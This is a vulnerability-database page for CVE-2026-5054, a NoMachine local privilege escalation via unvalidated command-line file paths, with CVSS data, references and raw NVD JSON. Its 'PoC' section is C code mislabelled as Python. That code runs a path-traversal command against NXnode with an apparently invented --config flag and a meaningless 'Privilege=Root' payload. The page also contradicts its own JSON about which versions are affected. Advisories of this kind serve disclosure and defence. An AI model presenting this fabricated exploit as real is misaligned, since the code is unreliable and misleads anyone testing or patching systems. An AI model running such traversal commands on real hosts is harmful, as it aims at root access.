CVE-2026-5054

Description

NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of command line parameters. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-28630.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nomachine:nomachine:*:*:*:*:*:*:*:* - VULNERABLE

NoMachine (受影响版本未明确指定)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>

// Conceptual PoC for CVE-2026-5054
// Exploits lack of path validation in command line arguments

int main() {
    // 1. Create a malicious payload file
    FILE *fp = fopen("/tmp/malicious_payload.txt", "w");
    if (fp) {
        fprintf(fp, "[Malicious Config]\nPrivilege=Root");
        fclose(fp);
    }

    // 2. Construct the path traversal payload
    // The vulnerable app takes a config path argument
    char *exploit_cmd = "/usr/bin/NXnode --config ../../../tmp/malicious_payload.txt";

    // 3. Execute the command
    // If NXnode runs as root and uses the path insecurely, the malicious file is loaded/written.
    system(exploit_cmd);

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5054
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5054
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5054/
[4] VulDB https://vuldb.com/cve/CVE-2026-5054
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-248/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5054", "sourceIdentifier": "[email protected]", "published": "2026-04-11T01:16:17.890", "lastModified": "2026-04-15T18:42:24.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of command line parameters. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-28630."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nomachine:nomachine:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.4.14", "matchCriteriaId": "99ABF7D0-787B-4153-8F4F-53F5B59609B4"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-248/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}